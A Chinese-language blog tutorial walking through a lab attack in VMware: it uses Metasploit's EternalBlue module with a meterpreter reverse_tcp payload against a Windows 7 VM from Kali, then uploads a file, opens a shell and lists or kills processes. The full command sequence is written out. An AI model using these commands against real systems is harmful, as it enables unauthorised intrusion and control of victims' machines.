今天就到我们实践了,首先声明实验环境,全程使用VMware模拟,包括被打的机器Windows7和攻击主机kali Linux
这里我们先介绍一下我们用到的两个工具
Nmap和msf
Nmap俗称诸神之眼,用于三层发现,端口扫描
Nmap的-A选项可以扫描出操作系统的大致版本(这个功能是相当强大的)
Msf
Payload:Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码,而在Metasploit中Payload是一种特殊模块,它们能够以漏洞利用模块运行,并能够利用目标系统中的安全漏洞实施攻击。简而言之,这种漏洞利用模块可以访问目标系统,而其中的代码定义了Payload在目标系统中的行为。
Shellcode:Shellcode是payload中的精髓部分,在渗透攻击时作为攻击载荷运行的一组机器指令。Shellcode通常用汇编语言编写。在大多数情况下,目标系统执行了shellcode这一组指令之后,才会提供一个命令行shell。
Single:
是一种完全独立的Payload,而且使用起来就像运行calc.exe一样简单,例如添加一个系统用户或删除一份文件。由于Single Payload是完全独立的,因此它们有可能会被类似netcat这样的非metasploit处理工具所捕捉到。
Stager:
这种Payload 负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条 tcp 连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
Stage:
是Stager Payload下的一种Payload组件,这种Payload可以提供更加高级的功能,而且没有大小限制。
这里就介绍完了
我们开始实验

先把bgm打开
先到kali Linux输入命令行msfconsole启动msf

会有如下的界面
这里我们就已经到了msf
然后我们输入search ms17(这个命令就是查找ms17)

这里exploit/windows/smb/ms17_010_eternalblue就是我们要用到的模块

use exploit/windows/smb/ms17_010_eternalblue使用这个攻击模板
这里我解释一下auxiliary/scanner/smb/smb_ms17_010和auxiliary/admin/smb/smb_ms17_010是两个辅助模块 这两个模块可以用来验证是否存在这个漏洞

这里是我们的Windows7靶机,有点小,我也不知道为什么这么小我也懒得调分辨率

然后我们输入show payloads可以看到我们能用的所有payload
这里我们要用set payload windows/x64/meterpreter/reverse_tcp

好了现在我们输入show options设置参数


这里就是我们要设置的参数
对于对方的ip地址我们还不知道,因为这里只是实验我们直接在Windows7上输入ipconfig看看就行

192.168.134.167
然后我们在kali上打开另一个命令行窗口

输入ifconfig查看本地的ip,哎呀不对,我设置一下

这样才是因为是内网渗透我刚刚给kali设置的是桥接而Windows7是nat这样就让这两台机器不在同一内网下了,我们得稍作更改可以看到192.168.134.150是我们kali本地的IP

set LHOST 192.168.134.150这里是设置本地IP LPORT不用管表示本地端口

设置目标IP为192.168.134.167

查看所有支持的类型

使用编号为2的类型(根据情况而定这里如何选择根据靶机的机型)
然后输入exploit启动(记得把Windows7的防火墙关了,不然打不进去)

这里就已经打进去了
我们输入run vnc看看桌面(这里需要稍等片刻)
这里出了一点点意外,因为机器性能不行,带不动
那么我们玩一点阴间的吧我们新建一个txt文档在根目录上,然后通过这里传到Windows7

这里我用vim编辑器在根目录打开了一个1.txt这里说明一下如果vim没有找到这个名字的文件就会新建一个


然后我们输入upload /1.txt
这里我们也可以使用其他的文件只不过txt纯属侮辱人用的
下面我们输入shell

那一坨未知符号就是中文因为我的kali没有中文语言包

可以看到这个权限还是很高的
我们输入tasklist看看现在有的进程

也可以使用taskkill杀掉进程
自己学会了慢慢玩吧
这一期就到这里了

![表情[hanxiao]-弘客联盟](https://www.honkeralliance.com/wp-content/themes/zibll/img/smilies/hanxiao.gif)


